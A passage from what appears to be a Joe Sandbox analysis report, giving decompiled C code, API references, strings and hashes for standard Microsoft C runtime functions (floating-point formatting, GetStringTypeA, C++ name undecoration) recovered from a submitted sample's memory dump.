                      					_t149 = _t149 + 0x18;
                      					if(_t111 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v24 != 0) {
                      					__eflags = _a8;
                      					if(_a8 <= 0) {
                      						_v28 = 0;
                      					} else {
                      						_v28 = 1;
                      					}
                      					_v32 = _v28;
                      					__eflags = _v32;
                      					if(__eflags == 0) {
                      						_t107 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x1e, 0, L"%ls", L"buffer_count > 0");
                      						_t149 = _t149 + 0x18;
                      						__eflags = _t107 - 1;
                      						if(_t107 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					__eflags = _v32;
                      					if(_v32 != 0) {
                      						_t113 = 1;
                      						 *_a4 = 0;
                      						__eflags = _a12;
                      						if(_a12 <= 0) {
                      							_v36 = 0;
                      						} else {
                      							_t113 = _a12;
                      							_v36 = _a12;
                      						}
                      						__eflags = _a8 - _v36 + 1;
                      						if(_a8 <= _v36 + 1) {
                      							_v40 = 0;
                      						} else {
                      							_v40 = 1;
                      						}
                      						_v44 = _v40;
                      						__eflags = _v44;
                      						if(__eflags == 0) {
                      							_t103 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x21, 0, L"%ls", L"buffer_count > static_cast<size_t>((digits > 0 ? digits : 0) + 1)");
                      							_t149 = _t149 + 0x18;
                      							__eflags = _t103 - 1;
                      							if(_t103 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v44;
                      						if(_v44 != 0) {
                      							__eflags = _a16;
                      							if(_a16 == 0) {
                      								_v48 = 0;
                      							} else {
                      								_v48 = 1;
                      							}
                      							_v52 = _v48;
                      							__eflags = _v52;
                      							if(__eflags == 0) {
                      								_t99 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x22, 0, L"%ls", L"pflt != nullptr");
                      								_t149 = _t149 + 0x18;
                      								__eflags = _t99 - 1;
                      								if(_t99 == 1) {
                      									asm("int3");
                      								}
                      							}
                      							__eflags = _v52;
                      							if(_v52 != 0) {
                      								_v12 = _a4;
                      								_v16 =  *((intOrPtr*)(_a16 + 8));
                      								 *_v12 = 0x30;
                      								_t136 = _v12 + 1;
                      								__eflags = _t136;
                      								_v12 = _t136;
                      								while(1) {
                      									__eflags = _a12;
                      									if(_a12 <= 0) {
                      										break;
                      									}
                      									__eflags =  *_v16;
                      									if( *_v16 == 0) {
                      										_v5 = 0x30;
                      									} else {
                      										_v5 =  *_v16;
                      										_v16 = _v16 + 1;
                      									}
                      									 *_v12 = _v5;
                      									_v12 = _v12 + 1;
                      									_a12 = _a12 - 1;
                      								}
                      								 *_v12 = 0;
                      								__eflags = _a12;
                      								if(_a12 < 0) {
                      									L47:
                      									__eflags =  *_a4 - 0x31;
                      									if( *_a4 != 0x31) {
                      										_t82 = E00992E00(_a4 + 1);
                      										__eflags = _a4 + 1;
                      										E0095B590(_a4, _a4 + 1, _t82 + 1);
                      									} else {
                      										 *((intOrPtr*)(_a16 + 4)) =  *((intOrPtr*)(_a16 + 4)) + 1;
                      									}
                      									__eflags = 0;
                      									return 0;
                      								}
                      								__eflags =  *_v16 - 0x35;
                      								if( *_v16 < 0x35) {
                      									goto L47;
                      								}
                      								_t89 = _v12 - 1;
                      								__eflags = _t89;
                      								_v12 = _t89;
                      								while(1) {
                      									__eflags =  *_v12 - 0x39;
                      									if( *_v12 != 0x39) {
                      										break;
                      									}
                      									 *_v12 = 0x30;
                      									_v12 = _v12 - 1;
                      								}
                      								_t91 =  *_v12 + 1;
                      								__eflags = _t91;
                      								 *_v12 = _t91;
                      								goto L47;
                      							} else {
                      								 *((intOrPtr*)(L00992F70(_t113))) = 0x16;
                      								E00992900(L"pflt != nullptr", L"__acrt_fp_strflt_to_string", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x22, 0);
                      								return 0x16;
                      							}
                      						} else {
                      							 *((intOrPtr*)(L00992F70(_t113))) = 0x22;
                      							E00992900(L"buffer_count > static_cast<size_t>((digits > 0 ? digits : 0) + 1)", L"__acrt_fp_strflt_to_string", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x21, 0);
                      							return 0x22;
                      						}
                      					} else {
                      						 *((intOrPtr*)(L00992F70(_t112))) = 0x16;
                      						E00992900(L"buffer_count > 0", L"__acrt_fp_strflt_to_string", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x1e, 0);
                      						return 0x16;
                      					}
                      				}
                      				 *((intOrPtr*)(L00992F70(_t112))) = 0x16;
                      				E00992900(L"buffer != nullptr", L"__acrt_fp_strflt_to_string", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x1d, 0);
                      				return 0x16;
                      			}

























                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: _strlen
                      • String ID: %ls$0$__acrt_fp_strflt_to_string$buffer != nullptr$buffer_count > 0$buffer_count > static_cast<size_t>((digits > 0 ? digits : 0) + 1)$minkernel\crts\ucrt\src\appcrt\convert\_fptostr.cpp$pflt != nullptr
                      • API String ID: 4218353326-3579526835
                      • Opcode ID: 89895df89eba9ee91e20b42ff85cbcba33f7179249d34f86d186cd06dbbe07ec
                      • Instruction ID: 8c1aaf8e10a80284dad9e12e510471dd7197f5ae63fb0b568b62afae23ced3e2
                      • Opcode Fuzzy Hash: 89895df89eba9ee91e20b42ff85cbcba33f7179249d34f86d186cd06dbbe07ec
                      • Instruction Fuzzy Hash: F3916D70E4430CAFDF10DF98CD56BEE7BB4AB95719F108459E9106B382C3B69981CB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E009A76D0(void* __ebx, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr* _a24, signed int _a28, intOrPtr _a32) {
                      				signed int _v8;
                      				signed int _v12;
                      				char* _v16;
                      				signed int _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				signed int _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				char _v68;
                      				intOrPtr _t124;
                      				signed int _t150;
                      				void* _t157;
                      				void* _t159;
                      				signed int _t174;
                      				signed int _t189;
                      				signed int _t201;
                      				signed int _t213;
                      				void* _t230;
                      				void* _t231;
                      
                      				_t230 = __esi;
                      				_t159 = __ebx;
                      				if(_a12 <= 0) {
                      					_v20 = 0;
                      				} else {
                      					_v20 = _a12;
                      				}
                      				_t161 = _v20 + 9;
                      				if(_a8 <= _v20 + 9) {
                      					_v24 = 0;
                      				} else {
                      					_v24 = 1;
                      				}
                      				_v28 = _v24;
                      				_t238 = _v28;
                      				if(_v28 == 0) {
                      					_t157 = L00994930(_t238, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cvt.cpp", 0x79, 0, L"%ls", L"result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)");
                      					_t231 = _t231 + 0x18;
                      					if(_t157 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v28 != 0) {
                      					L00976CC0(_t159,  &_v68, _t230, _a32);
                      					__eflags = _a28 & 0x000000ff;
                      					if((_a28 & 0x000000ff) != 0) {
                      						__eflags =  *_a24 - 0x2d;
                      						if( *_a24 != 0x2d) {
                      							_v32 = 0;
                      						} else {
                      							_v32 = 1;
                      						}
                      						_v48 = _a4 + _v32;
                      						__eflags = _a12;
                      						if(_a12 <= 0) {
                      							_v36 = 0;
                      						} else {
                      							_v36 = 1;
                      						}
                      						L009A7F10(_a4, _a8, _v48, _v36);
                      						_t231 = _t231 + 0x10;
                      					}
                      					_v8 = _a4;
                      					__eflags =  *_a24 - 0x2d;
                      					if( *_a24 == 0x2d) {
                      						 *_v8 = 0x2d;
                      						_t150 = _v8 + 1;
                      						__eflags = _t150;
                      						_v8 = _t150;
                      					}
                      					__eflags = _a12;
                      					if(_a12 > 0) {
                      						_t38 = _v8 + 1; // 0xe58b24c4
                      						 *_v8 =  *_t38;
                      						_t189 = _v8 + 1;
                      						__eflags = _t189;
                      						_v8 = _t189;
                      						 *_v8 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(E00977A60( &_v68))) + 0x88))))));
                      					}
                      					__eflags = _a28 & 0x000000ff;
                      					if((_a28 & 0x000000ff) == 0) {
                      						_v40 = 1;
                      					} else {
                      						_v40 = 0;
                      					}
                      					_v8 = _v8 + _a12 + _v40;
                      					__eflags = _a8 - 0xffffffff;
                      					if(_a8 != 0xffffffff) {
                      						_t201 = _a8 - _v8 - _a4;
                      						__eflags = _t201;
                      						_v44 = _t201;
                      					} else {
                      						_v44 = _a8;
                      					}
                      					E00994A20(E00992DE0(_v8, _v44, "e+000"), _t121, L"strcpy_s( p, result_buffer_count == static_cast<size_t>(-1) ? result_buffer_count : result_buffer_count - (p - result_buffer), \"e+000\")", L"fp_format_e_internal", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cvt.cpp", 0x9c, 0);
                      					_v16 = _v8 + 2;
                      					__eflags = _a16 & 0x000000ff;
                      					if((_a16 & 0x000000ff) != 0) {
                      						 *_v8 = 0x45;
                      					}
                      					_v8 = _v8 + 1;
                      					_t124 = _a24;
                      					__eflags =  *((char*)( *((intOrPtr*)(_t124 + 8)))) - 0x30;
                      					if( *((char*)( *((intOrPtr*)(_t124 + 8)))) != 0x30) {
                      						_t174 =  *((intOrPtr*)(_a24 + 4)) - 1;
                      						__eflags = _t174;
                      						_v12 = _t174;
                      						if(_t174 < 0) {
                      							_v12 =  ~_v12;
                      							 *_v8 = 0x2d;
                      						}
                      						_v8 = _v8 + 1;
                      						__eflags = _v12 - 0x64;
                      						if(_v12 >= 0x64) {
                      							asm("cdq");
                      							 *_v8 =  *_v8 + _v12 / 0x64;
                      							asm("cdq");
                      							_t86 = _v12 % 0x64;
                      							__eflags = _t86;
                      							_v12 = _t86;
                      						}
                      						_v8 = _v8 + 1;
                      						__eflags = _v12 - 0xa;
                      						if(_v12 >= 0xa) {
                      							asm("cdq");
                      							 *_v8 =  *_v8 + _v12 / 0xa;
                      							asm("cdq");
                      							_t102 = _v12 % 0xa;
                      							__eflags = _t102;
                      							_v12 = _t102;
                      						}
                      						_v8 = _v8 + 1;
                      						_t213 =  *_v8 + _v12;
                      						__eflags = _t213;
                      						 *_v8 = _t213;
                      					}
                      					__eflags = _a20 - 2;
                      					if(_a20 == 2) {
                      						__eflags =  *_v16 - 0x30;
                      						if( *_v16 == 0x30) {
                      							__eflags = _v16 + 1;
                      							E0095B590(_v16, _v16 + 1, 3);
                      						}
                      					}
                      					_v52 = 0;
                      					E00977230( &_v68);
                      					return _v52;
                      				}
                      				 *((intOrPtr*)(L00992F70(_t161))) = 0x22;
                      				E00992900(L"result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)", L"fp_format_e_internal", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cvt.cpp", 0x79, 0);
                      				return 0x22;
                      			}


























                      APIs
                      • __aligned_msize.LIBCMTD ref: 009A7883
                      • __invoke_watson_if_error.LIBCMTD ref: 009A788C
                      Strings
                      • d, xrefs: 009A78EB
                      • %ls, xrefs: 009A7719
                      • minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp, xrefs: 009A7722, 009A774C, 009A7867
                      • result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1), xrefs: 009A7714, 009A7756
                      • e+000, xrefs: 009A7876
                      • strcpy_s( p, result_buffer_count == static_cast<size_t>(-1) ? result_buffer_count : result_buffer_count - (p - result_buffer), "e+, xrefs: 009A7871
                      • fp_format_e_internal, xrefs: 009A7751, 009A786C
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: __aligned_msize__invoke_watson_if_error
                      • String ID: %ls$d$e+000$fp_format_e_internal$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)$strcpy_s( p, result_buffer_count == static_cast<size_t>(-1) ? result_buffer_count : result_buffer_count - (p - result_buffer), "e+
                      • API String ID: 4254006664-1740674501
                      • Opcode ID: d9162fb56fb0766ba7063bb19351c92e550ffaf1e2ae0bf1886917acd1b3fad8
                      • Instruction ID: b84b89b2d70cc94312fe1f57173408103545ecdcfd54f4ac00e4808b41902a8e
                      • Opcode Fuzzy Hash: d9162fb56fb0766ba7063bb19351c92e550ffaf1e2ae0bf1886917acd1b3fad8
                      • Instruction Fuzzy Hash: 2FA13F74E04248EFCF05CF98C991BAEBBB5BF86304F248199E4156B351C775AE40DB94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E009B5170(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, intOrPtr _a12, intOrPtr _a16, short* _a20, intOrPtr _a24, intOrPtr _a28) {
                      				char _v8;
                      				signed int _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				int _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				int _v48;
                      				char _v52;
                      				char _v68;
                      				signed int _t61;
                      				void* _t64;
                      				intOrPtr _t88;
                      				void* _t123;
                      				void* _t125;
                      				void* _t126;
                      				void* _t127;
                      
                      				_t123 = __edi;
                      				L00976CC0(__ebx,  &_v68, __esi, _a4);
                      				if(_a24 == 0) {
                      					_v16 =  *((intOrPtr*)( *((intOrPtr*)(E00977A60( &_v68))) + 8));
                      				} else {
                      					_v16 = _a24;
                      				}
                      				_v28 = _v16;
                      				if(_a28 == 0) {
                      					_v20 = 1;
                      				} else {
                      					_v20 = 9;
                      				}
                      				_t61 = E009B0990(_v28, _v20, _a12, _a16, 0, 0);
                      				_t126 = _t125 + 0x18;
                      				_v12 = _t61;
                      				if(_v12 != 0) {
                      					_t64 = E009B5110(_v12 << 1);
                      					_t127 = _t126 + 4;
                      					if(_t64 == 0) {
                      						_v24 = 0;
                      					} else {
                      						_t88 = E009B5140(E00999580(E009B5110(_v12 << 1), 2, "minkernel\\crts\\ucrt\\src\\appcrt\\locale\\getstringtypea.cpp", 0x51), 0xdddd);
                      						_t127 = _t127 + 0x1c;
                      						_v24 = _t88;
                      					}
                      					E009B5090( &_v8,  *((intOrPtr*)(E009B50B0( &_v52, _v24))));
                      					if(E009B50F0( &_v8) != 0) {
                      						E0095AF80(_t123, E009B50F0( &_v8), 0, _v12 << 1);
                      						_v32 = E009B0990(_v28, 1, _a12, _a16, E009B50F0( &_v8), _v12);
                      						if(_v32 != 0) {
                      							_v48 = GetStringTypeW(_a8, E009B50F0( &_v8), _v32, _a20);
                      							E009B50D0( &_v8);
                      							E00977230( &_v68);
                      							return _v48;
                      						}
                      						_v44 = 0;
                      						E009B50D0( &_v8);
                      						E00977230( &_v68);
                      						return _v44;
                      					} else {
                      						_v40 = 0;
                      						E009B50D0( &_v8);
                      						E00977230( &_v68);
                      						return _v40;
                      					}
                      				} else {
                      					_v36 = 0;
                      					E00977230( &_v68);
                      					return _v36;
                      				}
                      			}























                      APIs
                      • __wcstombs_l.LIBCMTD ref: 009B5229
                      • __MarkAllocaS.LIBCMTD ref: 009B5232
                        • Part of subcall function 009B0990: MultiByteToWideChar.KERNEL32(00000000,CCCCCCCC,?,?,?,?,?,?,00000000,CCCCCCCC), ref: 009B09C3
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009B524D
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009B5258
                      • std::_Mutex::_Lock.LIBCPMTD ref: 009B5273
                      • std::_Mutex::_Lock.LIBCPMTD ref: 009B52D7
                      • GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,00000000), ref: 009B52FE
                      • std::_Mutex::_Lock.LIBCPMTD ref: 009B530A
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp, xrefs: 009B5213
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiStringTypeWide__wcstombs_l
                      • String ID: minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp
                      • API String ID: 2378836076-24854585
                      • Opcode ID: 775828fef2d66fb528209cdad5ca3c914b169c11522ee6ee529cbe87f7f7168a
                      • Instruction ID: a4adfea06b11e5348fb3e66a6c98cd0bf9dc8a32ac780dabaf0daeb8ffabd68b
                      • Opcode Fuzzy Hash: 775828fef2d66fb528209cdad5ca3c914b169c11522ee6ee529cbe87f7f7168a
                      • Instruction Fuzzy Hash: 58515E71D10608EFDB04EFA8CD96BEEB778AF94310F504118F516A7281EB74AE05CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00964380(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                      				char _v8;
                      				char _v16;
                      				intOrPtr _v20;
                      				char _v24;
                      				intOrPtr _v28;
                      				char _v32;
                      				char _v40;
                      				char _v48;
                      				void* _t43;
                      				intOrPtr* _t56;
                      				intOrPtr _t58;
                      				intOrPtr _t70;
                      				intOrPtr _t71;
                      
                      				E0095F2A0( &_v16, _a8);
                      				_t56 =  *0xb30640; // 0x0
                      				_v8 =  *_t56;
                      				if(_v8 == 0) {
                      					E0095FB00(__eflags, _a4, 1,  &_v16);
                      					return _a4;
                      				}
                      				if(_v8 == 0x3f) {
                      					_t58 =  *0xb30640; // 0x0
                      					 *0xb30640 = _t58 + 1;
                      					E0095F820( &_v16, E00963A20(__ebx, __edi, __esi,  &_v48,  &_v16, 0, E0095F3F0( &_v40), 0));
                      					E00966AB0(__ebx, __edi, __esi, _a4,  &_v16);
                      					return _a4;
                      				}
                      				if(_v8 == 0x58) {
                      					_t70 =  *0xb30640; // 0x0
                      					_t71 = _t70 + 1;
                      					 *0xb30640 = _t71;
                      					_t43 = E0096A560( &_v16);
                      					__eflags = _t43;
                      					if(_t43 == 0) {
                      						_v32 = E00960060("void ", 5);
                      						_v28 = _t71;
                      						E0095FAA0(_a4,  &_v32,  &_v16);
                      						return _a4;
                      					}
                      					_v24 = E00960060("void", 4);
                      					_v20 = _t71;
                      					E0095F1F0(_a4,  &_v24);
                      					return _a4;
                      				}
                      				E00966AB0(__ebx, __edi, __esi, _a4,  &_v16);
                      				return _a4;
                      			}

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 0096438D
                        • Part of subcall function 0095F2A0: pDNameNode::pDNameNode.LIBCMTD ref: 0095F2DA
                      • operator+.LIBVCRUNTIMED ref: 009643C2
                      • DName::isEmpty.LIBCMTD ref: 009643E4
                        • Part of subcall function 00966AB0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00966AB9
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0096445A
                      • Mailbox.LIBCMTD ref: 00964476
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name$Iterator_baseIterator_base::_std::_$EmptyMailboxName::Name::isNodeNode::poperator+
                      • String ID: X$void$void
                      • API String ID: 3628514644-1260697050
                      • Opcode ID: 619d7217a01d1eae1899f7dffd11306c9cf23c00e296c7519f2e409d41093a1e
                      • Instruction ID: c46678aa62faa5e63056956b7f76b94b2d1ee631019e9658289ecaa04c2c455e
                      • Opcode Fuzzy Hash: 619d7217a01d1eae1899f7dffd11306c9cf23c00e296c7519f2e409d41093a1e
                      • Instruction Fuzzy Hash: 553154B5D54108ABDB04EFD4DC92BEE77B8AF84304F14C155F90967252EB34AB18CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 82%
                      			E00969D50(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                      				signed int _v5;
                      				char _v12;
                      				char _v20;
                      				char _v28;
                      				char _v36;
                      				char _v44;
                      				char _v52;
                      				char _v60;
                      				char* _t38;
                      				void* _t51;
                      				char* _t88;
                      				void* _t96;
                      				void* _t97;
                      
                      				_t95 = __esi;
                      				_t94 = __edi;
                      				_t65 = __ebx;
                      				_t38 =  *0xb30640; // 0x0
                      				if( *_t38 != 0) {
                      					E00968D00(__ebx, __edi, __esi,  &_v20);
                      					_t97 = _t96 + 4;
                      					if(E0096A6C0( &_v20) != 0) {
                      						E0095FDE0( &_v20, 0x7b);
                      						_v5 = 0;
                      						L5:
                      						while(1 != 0) {
                      							if((_v5 & 0x000000ff) != 0) {
                      								E0095FDE0( &_v20, 0x2c);
                      							}
                      							_t88 =  *0xb30640; // 0x0
                      							_v12 =  *_t88;
                      							_v12 = _v12 - 0x32;
                      							if(_v12 > 0xe) {
                      								L14:
                      								E0095FD40( &_v20, E00968D00(_t65, _t94, _t95,  &_v52));
                      								E0095FDE0( &_v20, 0x3a);
                      								_t51 = E009686C0(_t65, _t94, _t95,  &_v60);
                      								_t97 = _t97 + 8;
                      								E0095FD40( &_v20, _t51);
                      								goto L15;
                      							} else {
                      								_t16 = _v12 + 0x969f18; // 0xcccccc03
                      								switch( *((intOrPtr*)(( *_t16 & 0x000000ff) * 4 +  &M00969F04))) {
                      									case 0:
                      										 *0xb30640 =  *0xb30640 + 1;
                      										_t58 = E00969D50(_t65, _t94, _t95,  &_v28);
                      										_t97 = _t97 + 4;
                      										E0095FD40( &_v20, _t58);
                      										goto L15;
                      									case 1:
                      										 *0xb30640 =  *0xb30640 + 1;
                      										 *0xb30640 =  *0xb30640 + 1;
                      										__ecx =  &_v36;
                      										__eax = E00962860(__ebx, __edi, __esi,  &_v36);
                      										__ecx =  &_v20;
                      										__eax = E0095FD40(__ecx, __eax);
                      										goto L15;
                      									case 2:
                      										 *0xb30640 =  *0xb30640 + 1;
                      										 &_v44 = E009680D0(__ebx, __edi, __esi,  &_v44);
                      										__ecx =  &_v20;
                      										__eax = E0095FD40(__ecx, __eax);
                      										goto L15;
                      									case 3:
                      										L15:
                      										if(E0096A6C0( &_v20) != 0) {
                      											_t54 =  *0xb30640; // 0x0
                      											if( *_t54 != 0x40) {
                      												_v5 = 1;
                      												goto L5;
                      											}
                      											_t90 =  *0xb30640; // 0x0
                      											 *0xb30640 = _t90 + 1;
                      											goto L20;
                      										}
                      										E0095F350(_a4, 2);
                      										return _a4;
                      									case 4:
                      										goto L14;
                      								}
                      							}
                      						}
                      						L20:
                      						E0095FDE0( &_v20, 0x7d);
                      						E0095F240(_a4,  &_v20);
                      						return _a4;
                      					}
                      					E0095F350(_a4, 2);
                      					return _a4;
                      				}
                      				E0095F350(_a4, 1);
                      				return _a4;
                      			}

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00969D67
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • DName::isValid.LIBCMTD ref: 00969D83
                      • DName::DName.LIBVCRUNTIMED ref: 00969D91
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name$Name::$Name::isNode::makeStatusValid
                      • String ID:
                      • API String ID: 4056879799-0
                      • Opcode ID: 5c9da991224096a5c123d39ff7e5646128f59f4453c9e12698e9b49f25f51bf7
                      • Instruction ID: d07c833a0b3ee9a9ef3de0a6f770572c82b80d9b25ed7edcdb40caa1ec4e5088
                      • Opcode Fuzzy Hash: 5c9da991224096a5c123d39ff7e5646128f59f4453c9e12698e9b49f25f51bf7
                      • Instruction Fuzzy Hash: DF4190B09141189BDB05EF60DCA6BFE7778BF90345F140529E8065B1D6EF36AA08CB81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E0099A760(void* __ecx, void* __edi, intOrPtr _a4) {
                      				char _v8;
                      				signed int _v12;
                      				char _v16;
                      				signed int _v20;
                      				char _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _v40;
                      				intOrPtr _v44;
                      				signed int _v48;
                      				char _v52;
                      				char _v56;
                      				char _v60;
                      				intOrPtr _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      				signed int _v76;
                      				intOrPtr _v80;
                      				char _v84;
                      				signed char _t84;
                      				intOrPtr _t97;
                      				intOrPtr _t105;
                      				char* _t112;
                      				void* _t116;
                      				void* _t118;
                      				void* _t156;
                      				void* _t159;
                      
                      				_t156 = __edi;
                      				_t118 = __ecx;
                      				if(_a4 != 0) {
                      					__eflags = _a4 - 2;
                      					if(_a4 == 2) {
                      						L5:
